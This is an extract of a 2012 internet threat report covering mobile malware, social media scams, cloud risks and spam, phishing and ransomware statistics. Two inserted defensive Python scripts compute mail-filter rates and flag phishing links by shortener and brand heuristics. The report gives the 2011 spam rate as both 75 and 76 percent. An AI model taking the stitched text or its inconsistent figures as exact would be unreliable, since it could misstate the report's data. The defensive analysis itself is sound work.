Steal Information 32%
Traditional Threats 25%
Track User 15%
Send Content 13%
Reconfigure Device 8%
Adware/Annoyance 8%

• March was the most active month of 2012, with 121 vulnerabilities reported.
• There were 415 mobile vulnerabilities identified in 2012, compared with 315 in 2011.

Information stealing tops the list of activities carried out by mobile malware, with 32 percent of all threats recording some sort of information in 2012.
Cumulative Mobile Android Malware, Families and Variants 2010 to 2012
Source: Symantec
[Chart: cumulative Android malware families (0 to 200) and variants (0 to 5,000), January 2010 to January 2012.]

Mobile Threats by Device Type in 2012
Source: Symantec
Device Type Number of Threats
Android malware 103
Symbian malware 3
Windows Mobile malware 1
iOS malware 1

• 2012 saw a 58 percent increase in mobile malware families compared to 2011. The year’s total now accounts for 59 percent of all malware to date.
• At the same time the number of variants within each family has increased dramatically, from an average ratio of variants per family of 5:1 in 2011 to 38:1 in 2012. This indicates that threat authors are spending more time repackaging or making minor changes to their threats, in order to spread them further and avoid detection.

In contrast to vulnerabilities, Android was by far the most commonly targeted mobile platform in 2012, comprising 103 out of 108 unique threats.
Mobile Vulnerabilities by OS
Source: Symantec
Platform Documented Vulnerabilities
Apple iOS 387
Android 13
BlackBerry 13
Nokia 0
LG Electronics 0
Windows Mobile 2

The vast majority of vulnerabilities on mobile systems were on the iOS platform. However, the higher number of vulnerabilities is not indicative of a higher level of threat, because most mobile threats have not used software vulnerabilities.

Analysis

Spam and Phishing Move to Social Media

In the last few years, we’ve seen a significant increase in spam and phishing on social media sites. Criminals follow users to popular sites. As Facebook and Twitter have grown in popularity for users, they have also attracted more criminal activity. However, in the last year, online criminals have also started targeting newer, fast-growing sites such as Instagram, Pinterest, and Tumblr.

Typical threats include fake gift cards and survey scams. These kinds of fake offer scams account for more than half (56 percent) of all social media attacks. For example, in one scam the victim sees a post on somebody’s Facebook wall or in their Pinterest feed (where content appears from the people they follow or in specific categories) that says “Click here for a $100 gift card.” When the user clicks on the link, they go to a website where they are asked to sign up for any number of offers, turning over personal details in the process. The spammers get a fee for each registration and, of course, there’s no gift card at the end of the process.

[Figure: typical social media scam.]
[Figure: fake website with bogus survey.]
[Figure: phishing site spoofing a social networking site promoting soccer star Lionel Messi.]

We also documented a similar spam campaign on the popular photo-sharing app Instagram. 18

Another trick is to use a fake website to persuade a victim to reveal their personal details and passwords; for example, their Facebook or Twitter account information. These phishing scams are insidious and often exploit people’s fascination with celebrities such as professional athletes, film stars, or singers. We have seen an increase in phishing scams that target specific countries and their celebrities.

In 2012, we have seen ever more threats targeted at social media websites as well as more and more new channels and platforms opening up, especially those that are available only as mobile applications. It is likely that these mobile social channels will become more targeted in 2013, especially those that are aimed specifically at teenagers and young adults, who may not know how to recognize such attacks and may be a little freer with their personal details.
Mobile Threats

In the last year, we have seen a further increase in mobile malware. This correlates with increasing numbers of Internet-connected mobile devices. Android has a 72 percent market share with Apple® iOS a distant second with 14 percent, according to Gartner. 19 As a result of its market share and more open development environment, Android is the main target for mobile threats.

Typically, people use phones to store personal information and contact information, and increasingly they have high-speed Internet connections. The smartphone has become a powerful computer in its own right, and this makes these devices attractive to criminals. They also have the added advantage of being tied to a payment system—the owner’s phone contract—which means that they offer additional ways for criminals to siphon off money from the victim.

We’ve seen a big rise in all kinds of mobile phone attacks:
• Android threats were more commonly found in Eastern Europe and Asia; however, during the last year, the number of Android threats in the rest of Europe and the United States has increased.
• Privacy leaks that disclose personal information, including the release of surveillance software designed to covertly transmit the owner’s location. 20
• Premium number fraud where malicious apps send expensive text messages. This is the quickest way to make money from mobile malware. One mobile botnet Symantec observed used fake mobile apps to infect users and by our calculation the botmaster is generating anywhere between $1,600 and $9,000 per day and $547,500 to $3,285,000 per year. 21
• Mobile botnets. Just as spammers have linked networks of PCs into botnets to send out unwanted email, now criminals have begun using Android botnets the same way. 22 This suggests that attackers are adapting techniques used on PCs to work on smartphones.

Historically, malware infected smartphones through rogue app markets and users sideloading apps directly onto their devices. However, legitimate app stores are not immune. In 2012, we saw rogue software masquerading as popular games on the Google® Play market, having bypassed Google’s automated screening process. 23

Businesses are increasingly allowing staff to “bring your own device” (BYOD) to work, either by allowing them to use personal computers, tablets, or smartphones for work, or even subsidizing their purchase. Even when companies provide their own equipment, the trend towards consumerization means that companies often turn to consumer technology, such as file-sharing websites, and devices, such as consumer laptops or tablets, to reduce costs. These two trends open the door to a greater risk to businesses from mobile devices because they often lack security features such as encryption, access control, and manageability.
We have seen far more vulnerabilities for the iOS platform, which makes up 93 percent of those published, than for Android in 2012, yet Android dominates the malware landscape, with 97 percent of new threats.

While seemingly contradictory at first, there is a good reason for this: jailbreaking iOS devices. In order to install applications that are not available on the Apple App Store, a user must run an exploit against a vulnerability in the software. While not the safest approach from a security standpoint, this is the only way to install applications that are not available through the Apple App Store.

In contrast, the Android platform provides the option to install apps from unofficial markets by simply changing settings in the operating system. Since no exploit is needed, the same incentives aren’t present as there are on iOS. Android users are vulnerable to a whole host of threats; however, very few have utilized vulnerabilities to spread threats.

While Android clocks in with 103 threats in 2012, this number may appear small compared to other estimates on the scope of the mobile threat landscape. Many estimates are larger because they provide a count of overall variants, as opposed to new, unique threats. While many of these variants have simply undergone minor changes in an attempt to avoid detection by antivirus scanners, Symantec counted at least 3,906 different mobile variants for the year.

There’s an important distinction between old and new Android versions regarding security features. Google added a feature in Android version 4.x to allow users to block any particular app from pushing notifications into the status bar. This came in response to feedback from users of older versions, annoyed by ad platforms that push notifications to the status bar.

Also, due to the rise of threats that silently send premium text messages—Android.Opfake, Android.Premiumtext, Android.Positmob, and Android.Rufraud, for instance—Google added a feature in Android 4.2 to prompt the user to confirm sending such premium text messages. This can be very helpful in protecting most users.
However, at around 10 percent market penetration at the end of 2012, 24 Android 4.2 devices account only for a small percentage of the total devices out there. The Android ecosystem makes it harder to keep everyone up to date. Google released the official platform that works out of the box only on Nexus devices—Google’s own branded devices. From there each manufacturer modifies and releases its own platform, which is in turn picked up by mobile network operators who also customize those platforms.

This makes it impossible for any change coming from Google to be quickly available to all in-field devices. Any change to the platform requires thorough testing by each manufacturer and then each operator, all adding to the time needed to reach users. Having so many device models also multiplies the amount of resources all these companies have to allocate for each update, leading to infrequently released updates or in some cases no updates for older devices.

For most exploits in the OS, Google released quick fixes; however, users still had long waits before they received the fix from their network operators. Some exploits are not in the original OS itself but in the custom modifications made by manufacturers, such as the exploit for Samsung models that appeared in 2012. Samsung was quick to fix it, but the fix still had to propagate through network operators to reach users.

Tighter control from Google over the platform can solve some of the “fragmentation” issues, but this could affect the relationship it has with manufacturers. A cut-off point for older Android users could help to mitigate the risk, but it is usually the manufacturers that do this.
Cloud Computing Risks

The cloud services market was expected to grow by 20 percent in 2012, according to Gartner. 25 Cloud computing promises businesses a way to enhance their IT without heavy upfront capital costs and, for smaller businesses, it offers access to enterprise-class business software at an affordable price. On a fundamental level, it offers huge and growing economies of scale as Internet bandwidth and processing power continue to increase rapidly.

Cloud computing offers some potential security benefits, especially for smaller companies without dedicated IT security staff. Well-run cloud applications are more likely to be patched and updated efficiently. They are also more likely to be resilient, secure, and backed up than on-premises systems.

However, cloud computing presents some security concerns, too:
• Privacy. Well-run cloud companies will have strong policies about who can access customer data (for example, for troubleshooting) and under what circumstances. Information should only be entrusted to a third party over the Internet where there is sufficient assurance as to how that data will be managed and accessed.
• Data Liberation. Cloud computing businesses make it easy to get started, and reputable companies make it easy to extract your data (for example, archived emails or customer records) if you want to change providers. Before entrusting their data to a cloud provider, potential users should fully evaluate the terms and conditions of extracting and recovering that data at a later date.
• Eggs in One Basket. As we have seen from large-scale data breaches in the last few years, attackers tend to go where they can score the most data for the least effort. If a cloud services provider stores confidential information for a large number of customers, it becomes a bigger target for attackers. A single breach at a cloud provider could be a gold mine of personal data for an attacker.
• Consumerization. Companies face a significant risk of accidental or deliberate data loss when their employees use unapproved cloud systems on an ad-hoc basis. For example, if company policies make it difficult to email large files to third parties, employees may decide to use free online file sharing applications instead. The risk is that these systems may fall short of company standards for security. For example, one popular file-sharing site left all its user accounts unlocked for four hours. 26 In addition, where employees use unauthorized cloud applications for their work, such as social networking sites for marketing purposes, they open up the company to attack from Web-based malware.
• Infrastructure. Although not in the wild, there is a theoretical risk that in a virtualized, multi-tenant architecture, a malicious user could rent a virtual machine and use it to launch an attack against the system by exploiting a vulnerability in the underlying hypervisor and use this to gain access to other virtual machines running in the same environment. Consideration should also be given to data encryption within the virtual machine to minimize the risk from unauthorized access to the physical hard disks.
Recommendations

Social Media Threats Are a Business Issue. Companies are often unwilling to block access to social media sites altogether, but they need to find ways to protect themselves against Web-based malware on these and other sites. This means multi-layer security software at the gateway and on client PCs. It also requires aggressive patching and updating to reduce the risk of drive-by infections. Lastly, user education and clear policies are essential, especially regarding the amount of personal information users disclose online.

Cloud Security Advice. 27 Carry out a full risk assessment before signing up. Secure your own information and identities. Implement a strong governance framework.

Protect Your Mobile Devices. Consider installing security software on mobile devices. Also, users need to be educated about the risks of downloading rogue applications and how to use their privacy and permission settings. For company-provided devices, consider locking them down and preventing the installation of unapproved applications altogether.
Malware, Spam, and Phishing
Introduction

Malware, spam, and social engineering continue to be massive, chronic problems. Although they have been around for a long time, attacks continue to evolve and they still have the potential to do serious damage to consumers and businesses.

In addition, they hurt everyone by undermining confidence in the Internet. These chronic threats do not get much news coverage because they are “background noise” but that doesn’t mean that they are unimportant. A useful comparison is the difference between plane crashes and car crashes. A single plane crash makes the national news, but the daily death toll on the roads goes unreported despite killing significantly more people each year. 28

The popularity of ransomware is an example of all these themes. It permanently locks people out of their computer unless they pay a swinging “fine” to the perpetrators. It’s corrosive to trust, expensive to remedy, and reveals a new level of ruthlessness and sophistication.

The numbers are telling. In one example, malware called Reveton (aka Trojan.Ransomlock.G) was detected attempting to infect 500,000 computers over a period of 18 days. According to a recent Symantec survey of 13,000 adults in 24 countries, average losses per cybercrime incident are $197. 29 In the last 12 months an estimated 556 million adults worldwide experienced some form of cybercrime.

At a Glance
• With ransomware, malware has become more vicious and more profitable.
• Email spam volumes fall again, down 29 percent in 2012, as spammers move to social media.
• Phishing becomes more sophisticated and targets social networking sites.

Irreversible ransomware locks people out of their computer unless they pay a “fine,” which in most cases does not unlock the computer.
Data

Spam
Spam rates declined for a second year in a row, dropping from 75 percent in 2011 to 69 percent of all email in 2012. In 2011 we were reluctant to call this decrease in spam a permanent trend. Botnets can be rebuilt, new ones created. But several factors appear to be keeping spam rates lower than in previous years.

The takedowns of spam botnets continued in 2012. In March 2012 a resurrected Kelihos botnet was taken down for a second time. In July the Grum botnet was taken down. While both were significant spam botnets and contributed to the reduction in spam, undoubtedly email spammers are still feeling the pain of botnet takedowns from 2011.

Additionally, pharmaceutical spam continues to decline, apparently unable to recover from the loss of the major players in the online pharmaceutical business. 30 Given advancements in anti-spam technology, plus the migration of many users to social networks as a means of communication, spammers may be diversifying in order to stay in business.

This is not to say that the problem of spam has been solved. At 69 percent of all email, it still represents a significant amount of unwanted messages.

As email spam rates continue to decline, we see the same social engineering techniques that have been used in email spam campaigns increasingly being adopted in spam campaigns promoted through social networking channels.
Top 5 Activity for Spam Destination by Geography
Country %
Saudi Arabia 79%
Bulgaria 76%
Chile 74%
Hungary 74%
China 73%

Top 5 Activity for Spam Destination by Industry
Industry %
Marketing/Media 69%
Manufacturing 69%
Recreation 69%
Agriculture 69%
Chemical/Pharmaceutical 69%

Top 5 Activity for Spam Destination by Company Size
Organization Size %
1-250 68%
251-500 68%
501-1,000 68%
1,001-1,500 69%
1,501-2,500 69%
2,501+ 68%
Global Spam Volume Per Day in 2012
Source: Symantec
[Chart: billions of spam emails per day, January to December 2012; y-axis 10 to 60 billion.]

Global Spam Rate – 2012 vs 2011
Source: Symantec
[Chart: monthly spam rate as a percentage of all email, 2011 and 2012; y-axis 0 to 90%.]

• Spam volumes were highest in August.
• The estimated projection of global spam volumes decreased by 29 percent, from 42 billion spam emails per day in 2011, to 30 billion in 2012.

The overall average global spam rate for 2012 was 69 percent, compared with 75 percent in 2011.
Pharmaceutical Spam – 2012 vs 2011
Source: Symantec
[Chart: monthly share of all spam, 2011 and 2012; y-axis 10 to 70%.]

Adult/Sex/Dating Spam – 2012 vs 2011
Source: Symantec
[Chart: monthly share of all spam, 2011 and 2012; y-axis 10 to 90%.]

• Pharmaceutical spam makes up 21 percent of all spam, but was overtaken by the Adult/Sex/Dating category, which now makes up 55 percent of spam.
• Pharmaceutical spam in 2012 declined by approximately 19 percentage points compared with 2011.
• Adult/Dating spam in 2012 increased by approximately 40 percentage points compared with 2011.
• This suggests an almost direct correlation between the decline in pharmaceutical spam and the increase in dating spam.
• The proportion of adult/sex/dating spam was greater in 2012 than for pharmaceutical spam in 2011, but the actual volume of adult/sex/dating spam in 2012 was lower than for pharmaceutical spam in 2011, since overall spam volumes were lower in 2012 than in the previous year.
Phishing

Email phishing rates are also down this year, from one in 299 emails in 2011 to one in 414 in 2012.

The decline in the use of email as a method to spread spam and carry out phishing attacks does not likely indicate a drop in activity by attackers. Rather, it appears that we are seeing a shift in activity from email to other forms of online communication, such as social networks.

Top 5 Activity for Phishing Destination by Industry
Industry 1 in
Public Sector 1 in 95
Finance 1 in 211
Education 1 in 223
Accommodation/Catering 1 in 297
Marketing/Media 1 in 355

Top 5 Activity for Phishing Destination by Geography
Country 1 in
Netherlands 1 in 123
South Africa 1 in 177
United Kingdom 1 in 191
Denmark 1 in 374
China 1 in 382

Top 5 Activity for Phishing Destination by Company Size
Company Size 1 in
1-250 1 in 294
251-500 1 in 501
501-1,000 1 in 671
1,001-1,500 1 in 607
1,501-2,500 1 in 739
2,501+ 1 in 346

Phishing Rate – 2012 vs 2011
Source: Symantec
[Chart: monthly phishing rate as 1 in N emails, 2011 and 2012; y-axis 1 in 100 to 1 in 600.]

• Phishing rates have dropped drastically in 2012, in many cases less than half the number for that month in the previous year.
• The overall average phishing rate for 2012 was 1 in 414 emails, compared with 1 in 299 in 2011.
Malware

One in 291 emails contained a virus in 2012, which is down from one in 239 in 2011. Of that email-borne malware, 23 percent of it contained URLs that pointed to malicious websites. This is also down from 2011, where 39 percent of email-borne malware contained a link to a malicious website.

Much like the drop in spam and phishing rates, a drop in emails that contain viruses does not necessarily mean that attackers have stopped targeting users. Rather, it more likely points to a shift in tactics, targeting other online activities, such as social networking.
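The spam, phishing and malware figures in this Data section are all derived the same way from per-message gateway verdicts: spam as a percentage of all email, phishing and virus as a “1 in N” rate, the URL share as a percentage of virus messages, each broken down by the recipient organization’s size band. The following is an added example, not code from the Symantec report: it computes those same four measures from a constructed mail-gateway log, using the company-size bands of the tables in this section, and handles the case the tables quietly skip, a band with no hits at all (where “1 in N” is undefined). The log lines, their format and the counting conventions are assumptions of the example.

```python
"""Derive spam, phishing and email-malware rates from a mail-gateway log.

Added example, not part of the Symantec report. The log format, the sample
lines and the counting rules are constructed for illustration.
"""
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed gateway log: timestamp, recipient organization size (users),
# verdict (clean | spam | phishing | virus), and a flag set when a message
# carried a URL rather than an attachment.
SAMPLE_LOG = """\
# timestamp,org_size,verdict,url_flag
2012-08-01T08:00:01Z,180,clean,0
2012-08-01T08:00:02Z,180,spam,0
2012-08-01T08:00:03Z,180,spam,1
2012-08-01T08:00:04Z,180,phishing,1
2012-08-01T08:00:05Z,180,clean,0
2012-08-01T08:00:06Z,180,virus,1
2012-08-01T08:00:07Z,180,spam,0
2012-08-01T08:00:08Z,180,clean,0
2012-08-01T08:00:09Z,1200,clean,0
2012-08-01T08:00:10Z,1200,spam,0
2012-08-01T08:00:11Z,1200,clean,0
2012-08-01T08:00:12Z,1200,virus,0
2012-08-01T08:00:13Z,1200,clean,0
2012-08-01T08:00:14Z,1200,spam,1
2012-08-01T08:00:15Z,3000,clean,0
2012-08-01T08:00:16Z,3000,phishing,1
2012-08-01T08:00:17Z,3000,spam,0
2012-08-01T08:00:18Z,3000,clean,0
"""

# Company-size bands as used in the report's tables (upper bound, label).
SIZE_BANDS: List[Tuple[int, str]] = [
    (250, "1-250"), (500, "251-500"), (1000, "501-1,000"),
    (1500, "1,001-1,500"), (2500, "1,501-2,500"),
]


def size_band(org_size: int) -> str:
    """Map an organization's user count to its reporting band."""
    for upper, label in SIZE_BANDS:
        if org_size <= upper:
            return label
    return "2,501+"


def one_in(total: int, hits: int) -> Optional[int]:
    """Express hits/total as '1 in N' (rounded); None when there were no hits,
    since the ratio is then undefined rather than zero."""
    return None if hits == 0 else round(total / hits)


def percent(part: int, whole: int) -> Optional[float]:
    """Percentage to one decimal place; None when the denominator is zero."""
    return None if whole == 0 else round(100.0 * part / whole, 1)


def parse_log(log_text: str) -> List[Tuple[str, str, bool]]:
    """Yield (band, verdict, has_url) per message, skipping comments/blanks."""
    records = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        _ts, size, verdict, url_flag = line.split(",")
        records.append((size_band(int(size)), verdict, url_flag == "1"))
    return records


def compute_rates(log_text: str) -> Dict[str, Dict[str, Optional[float]]]:
    """Per band and overall ("all"): spam as % of all mail, phishing and virus
    as 1 in N, and the share of virus mail that carried a URL. A message is
    counted under exactly one verdict, so phishing and virus are not also
    counted as spam (an assumption of this example)."""
    counts: Dict[str, Counter] = defaultdict(Counter)
    for band, verdict, has_url in parse_log(log_text):
        for key in (band, "all"):
            counts[key]["total"] += 1
            counts[key][verdict] += 1
            if verdict == "virus" and has_url:
                counts[key]["virus_url"] += 1
    return {
        key: {
            "messages": c["total"],
            "spam_pct": percent(c["spam"], c["total"]),
            "phishing_one_in": one_in(c["total"], c["phishing"]),
            "virus_one_in": one_in(c["total"], c["virus"]),
            "virus_url_pct": percent(c["virus_url"], c["virus"]),
        }
        for key, c in counts.items()
    }


if __name__ == "__main__":
    for band, r in sorted(compute_rates(SAMPLE_LOG).items()):
        print(f"{band:12s} msgs={r['messages']:3d} spam={r['spam_pct']}% "
              f"phish=1 in {r['phishing_one_in']} virus=1 in {r['virus_one_in']} "
              f"virus-with-URL={r['virus_url_pct']}%")
```

With a year of real gateway verdicts in place of SAMPLE_LOG the same functions produce the kind of figures tabulated above; the None results are the reason published tables only show bands and industries with enough traffic to make “1 in N” meaningful.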
Top 5 activity for Malware destination by geography<br />
Country 1 in<br />
netherlands 1 in 108<br />
Luxembourg 1 in 144<br />
united Kingdom 1 in 163<br />
south Africa 1 in 178<br />
Germany 1 in 196<br />
Proportion of Email Traffic in Which Virus Was detected – 2012 vs 2011<br />
Source: Symantec<br />
1 in 50<br />
1 in 100<br />
1 in 150<br />
1 in 200<br />
1 in 250<br />
1 in 300<br />
1 in 350<br />
1 in 400<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
Top 5 Activity for Malware Destination by Industry<br />
Industry – 1 in<br />
Public Sector 1 in 72<br />
Education 1 in 163<br />
Finance 1 in 218<br />
Marketing/Media 1 in 235<br />
Accommodation/Catering 1 in 236<br />
Top 5 Activity for Malware Destination by Company Size<br />
Company Size – 1 in<br />
1-250 1 in 299<br />
251-500 1 in 325<br />
501-1,000 1 in 314<br />
1,001-1,500 1 in 295<br />
1,501-2,500 1 in 42<br />
2,501+ 1 in 252<br />
• Overall numbers declined, with one in 291 emails containing a virus.<br />
• In 2011, the average rate for email-borne malware was 1 in 239.
p. 47<br />
Proportion of Email Traffic Containing URL Malware – 2012 vs 2011<br />
Source: Symantec<br />
[Chart: monthly percentage of email malware that contained a URL, 2011 vs 2012; axis ticks omitted]<br />
Website Malware Blocked Per Day<br />
Source: Symantec<br />
[Chart: website malware blocked per day, in thousands, by month, 2011 vs 2012; axis ticks omitted]<br />
• Emails that contained a malicious URL dropped significantly in 2012; in some months the drop was more than half of the rate for the same month in 2011.<br />
• In 2012, approximately 23 percent of email malware contained a URL rather than an attachment, compared with 39 percent in 2011.<br />
• In 2012, approximately 247,350 Web-based attacks were blocked each day.<br />
• In 2011, this figure was approximately 190,370 per day. This represents an increase of 30 percent.
p. 48<br />
Website Exploits by Type of Website<br />
Based on Norton Safe Web data, the Symantec technology that scans the Web looking for websites hosting malware, we’ve determined that 61 percent of malicious sites are actually regular websites that have been compromised and infected with malicious code.<br />
We see Business, which covers consumer and industrial goods and service sectors, listed at the forefront this year. This could be due to the contribution of compromised sites from many SMBs that do not invest in appropriate resources to protect them. Hacking, which includes sites that promote or provide the means to carry out hacking activities, jumped to second, though it didn’t appear in the top 15 in 2011.<br />
Although the Technology and Telecommunication category, which provides information pertaining to computers, the Internet, and telecommunication, ranks third this year, it sees 5.7 percent of the total compromised sites, only a 1.2 percent drop from 2011. Shopping sites, which provide the means to purchase products or services online, remain in the top five, but Shopping sees a drop of 4.1 percent.<br />
It is interesting to note that Hosting, which ranked second in 2011, has moved down to seventh this year. This category covers services that provide individuals or organizations access to online systems for websites or storage. Due to the increase in reliable and free cloud-based hosting solutions, provided by the likes of Google, Dropbox, and others, we see usage moving away from unreliable hosting solutions, which could have contributed towards the drop. Blogging has also experienced a significant drop in 2012, moving down to fourth position. This could support the theory that people are moving towards social networking and exchanging information through such networks. Malware developers find it easy to insert malicious code into such sites and spread it by various means.<br />
Website Exploits by Type of Website<br />
Source: Symantec<br />
Rank – Top Domain Categories that Got Exploited by # of Sites – # of Infected Sites / Total # of Infected Sites<br />
1 Business 7.7%<br />
2 Hacking 7.6%<br />
3 Technology and Telecommunication 5.7%<br />
4 Blogging 4.5%<br />
5 Shopping 3.6%<br />
6 Known Malware Domain 2.6%<br />
7 Hosting 2.3%<br />
8 Automotive 1.9%<br />
9 Health 1.7%<br />
10 Educational 1.7%<br />
Top 10 Malware in 2012<br />
Source: Symantec<br />
Rank – Malware Name – %<br />
1 W32.Sality.AE 6.9%<br />
2 W32.Ramnit.B 5.1%<br />
3 W32.Downadup.B 4.4%<br />
4 W32.Virut.CF 2.2%<br />
5 W32.SillyFDC 1.1%<br />
6 W32.Mabezat.B 1.1%<br />
7 W32.Xpaj.B 0.6%<br />
8 W32.Changeup 0.6%<br />
9 W32.Downadup 0.5%<br />
10 W32.Imaut 0.4%
p. 49<br />
Analysis<br />
Macs Under Attack<br />
Historically, Mac users have felt less vulnerable to malware than PC users. As Apple has gained market share, Macs have become a more attractive target. In fact, 2012 saw the first significant Mac malware outbreak. The Flashback attack exploited a vulnerability in Java to create a cross-platform threat.[31] It was incorporated into the Blackhole attack toolkit and used by criminals to infect 600,000 Macs,[32] which is approximately one Mac in 100. Like more and more attacks in 2012, as discussed in the “Web Attack Toolkits” section, it spread when users visited infected websites. Although the Flashback malware was mainly used for advertising click fraud, it had other capabilities, such as giving hackers remote access to infected computers.[33] Because most Mac users do not have antivirus software, the chances of detection, once infected, were small.<br />
Does this indicate that hackers are going to start paying further attention to Macintosh computers as a platform to target? Not necessarily. While Mac users may encounter an occasional threat here or there, the vast majority of what they encounter is malware aimed at Windows computers. In fact, of all the threats encountered by Symantec customers who used Mac computers in the last quarter of 2012, only 2.5 percent were actually written specifically for Macs.<br />
This isn’t to say that Macs are a safer alternative to PCs; as we’ve seen, they’re just as susceptible to attacks. There were more threats created specifically for the Mac in 2012 than in years past, and the trend appears to be rising.<br />
[Chart: Mac threat families by year, 2007–2012; callout: 10 Mac threat families in 2012]<br />
There were more unique threats for OS X in 2012 than any year previously.
p. 50<br />
Rise of Ransomware<br />
Ransomware became a bigger challenge in 2012 as its popularity among malware authors increased. Unlike scareware, which encouraged you to buy fake antivirus protection, ransomware simply locks your computer and demands a release fee. The malware is often quite sophisticated and difficult to remove, and in some cases it persists in safe mode, blocking attempts at remote support.<br />
Victims usually end up with ransomware from drive-by downloads, when they are silently infected while visiting websites that host Web attack toolkits. These are often legitimate sites that have been compromised by hackers who insert the malicious download code. Another source of infection is malvertisements, where criminals buy advertising space on legitimate websites and use it to hide their attack code, as discussed in the malvertisement section.<br />
[Figure: Typical ransomware locking screen showing a fake police warning.]<br />
The perpetrators use social engineering to increase the chances of payment. The locking screen often contains a fake warning from local law enforcement, and the ransom is presented as a fine for criminal activity online. In some cases, ransomware also takes a photo of the victim using the webcam and displays this image in the locking screen, which can be unnerving for victims.<br />
Criminals use anonymous money transfer systems or prepaid credit cards to receive the payments. The ransom typically ranges between $50 and $400. In many cases, payment doesn’t unlock the computer. Symantec monitored a ransomware command and control server and saw 5,300 computers infected. About three percent of victims paid the ransom, which netted the criminals about $30,000.
p. 51<br />
Long-term Stealthy Malware<br />
Internet criminals are also making money from malware that stays hidden on victims’ computers. Operating in botnets with many thousands of computers acting collectively, these stealthy programs send out spam or generate bogus clicks on website advertisements (which generate referral income for the site owners). These techniques don’t generate rapid returns like ransomware; however, they are much less likely to be discovered and, thanks to clever coding, are more difficult to remove. Consequently, they can generate a constant stream of revenue over time.<br />
Email Spam Volume Down<br />
After decreases in 2011, this year saw a further reduction in the volume of email spam, from 76 percent of all email messages to 69 percent. There are several reasons for this. First, law enforcement action has closed down several botnets, reducing the number of messages being sent.[34] Second, spammers are increasingly redirecting their efforts to social media sites instead of email. Lastly, spammers are improving the quality and targeting of their spam messages in an effort to bypass filters, and this has led to a reduction in the overall numbers being sent.<br />
Advanced Phishing<br />
While spam has declined slightly in 2012, phishing attacks have increased. Phishers are using very sophisticated fake websites—in some cases, perfect replicas of real sites—to trick victims into revealing personal information, passwords, credit card details, and bank credentials. In the past they relied more on fake emails, but now those emails, coupled with similar links posted on social media sites, are used to lure the victim to these more advanced phishing websites.<br />
Typical fake sites include banks and credit card companies, as you’d expect, but also popular social media sites. The number of phishing sites that spoofed social network sites increased 123 percent in 2012.<br />
If criminals can capture your social media login details, they can use your account to send phishing emails to all your friends. A message that seems to come from a friend appears much more trustworthy. Another way to use a cracked social media account is to send out a fake message to someone’s friends about some kind of emergency. For example, “Help! I’m stuck overseas and my wallet has been stolen. Please send $200 as soon as possible.”<br />
In an attempt to bypass security and filtering software, criminals use complex website addresses and nested URL shortening services. They also use social engineering to motivate victims to click on links. In the last year, they have focused their messages around celebrities, movies, sports personalities, and attractive gadgets such as smartphones and tablets. The number of phishing websites that used SSL certificates in an attempt to lull victims into a false sense of security increased by 46 percent in 2012 compared with the previous year.<br />
We saw a significant (threefold) rise in non-English phishing in 2012. In particular, we saw a significant increase in South Korea. The non-English languages that had the highest number of phishing sites were French, Italian, Portuguese, Chinese, and Spanish.
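A way to triage the kind of links this section describes, as an added example that is not from the report: a Python helper that follows a URL-shortener chain offline and flags nested shorteners, long hostnames that put a brand name in front of an unrelated registered domain, and HTTPS on an otherwise suspicious landing page. The shortener list, redirect table, brand watch list and every sample URL are constructed for the example and stand in for a live shortener feed and real HTTP redirects.<br />

```python
"""Offline triage of suspicious links: follow a shortener chain and apply
heuristics for the tricks named in the text (nested URL shorteners,
complex hostnames, SSL certificates on phishing sites).

Constructed data: SHORTENER_HOSTS, REDIRECTS and BRANDS are stand-ins for
a real shortener list, the Location headers a live fetch would return,
and a brand watch list.
"""
from urllib.parse import urlparse

# Constructed list of well-known shortener hosts (hypothetical feed).
SHORTENER_HOSTS = {"bit.ly", "t.co", "goo.gl", "tinyurl.com", "ow.ly"}

# Constructed redirect table: each key answers with one redirect, standing
# in for an HTTP 301/302 response. The landing host is invented and puts a
# bank-like name in front of an unrelated registered domain on purpose.
REDIRECTS = {
    "http://bit.ly/3xAbCd": "http://t.co/9ZyQ",
    "http://t.co/9ZyQ": "http://goo.gl/k7Lm",
    "http://goo.gl/k7Lm": "https://secure-login.examplebank.com.verify-account.info/signin",
    "http://bit.ly/loop1": "http://t.co/loop2",
    "http://t.co/loop2": "http://bit.ly/loop1",  # deliberate cycle
}

# Constructed watch list of brand names a phisher would imitate.
BRANDS = ("examplebank", "examplepay", "examplesocial")

MAX_HOPS = 5  # stop runaway chains instead of following them forever


def host_of(url):
    """Lower-cased hostname of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def registered_domain(host):
    """Crude eTLD+1: the last two labels. Assumption: no multi-label public
    suffixes (e.g. co.uk) occur in the sample; real code should use a PSL."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def follow_chain(url, redirects=REDIRECTS, max_hops=MAX_HOPS):
    """Walk redirects from `url`. Returns (final_url, hops_taken,
    shortener_hops, truncated); truncated is True when a cycle was detected
    or max_hops was reached, in which case final_url is where we stopped."""
    seen = set()
    hops = []
    shortener_hops = 0
    current = url
    while current in redirects:
        if current in seen or len(hops) >= max_hops:
            return current, hops, shortener_hops, True
        seen.add(current)
        if host_of(current) in SHORTENER_HOSTS:
            shortener_hops += 1
        hops.append(current)
        current = redirects[current]
    return current, hops, shortener_hops, False


def assess(url):
    """Resolve `url` and return the landing URL, hop count and a list of
    human-readable findings (an empty list means nothing looked suspicious)."""
    final, hops, shortener_hops, truncated = follow_chain(url)
    parsed = urlparse(final)
    host = (parsed.hostname or "").lower()
    findings = []

    if shortener_hops >= 2:
        findings.append(f"nested shorteners ({shortener_hops} shortener hops)")
    if truncated:
        findings.append("redirect loop or chain longer than MAX_HOPS")

    labels = host.split(".")
    if len(labels) >= 4:
        findings.append(f"complex hostname ({len(labels)} labels)")

    reg = registered_domain(host)
    for brand in BRANDS:
        if brand in host and brand not in reg:
            findings.append(f"brand '{brand}' appears outside registered domain {reg}")

    # A valid certificate says nothing about who controls the site: once the
    # URL is suspicious on other grounds, HTTPS must not restore trust.
    if parsed.scheme == "https" and findings:
        findings.append("https on a suspicious site: do not treat the padlock as a trust signal")

    return {"final_url": final, "hops": len(hops), "findings": findings}


if __name__ == "__main__":
    for sample in ("http://bit.ly/3xAbCd",
                   "https://www.examplebank.com/login",
                   "http://bit.ly/loop1"):
        report = assess(sample)
        print(sample, "->", report["final_url"], f"({report['hops']} hops)")
        for finding in report["findings"]:
            print("   ", finding)
```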
p. 52<br />
Recommendations<br />
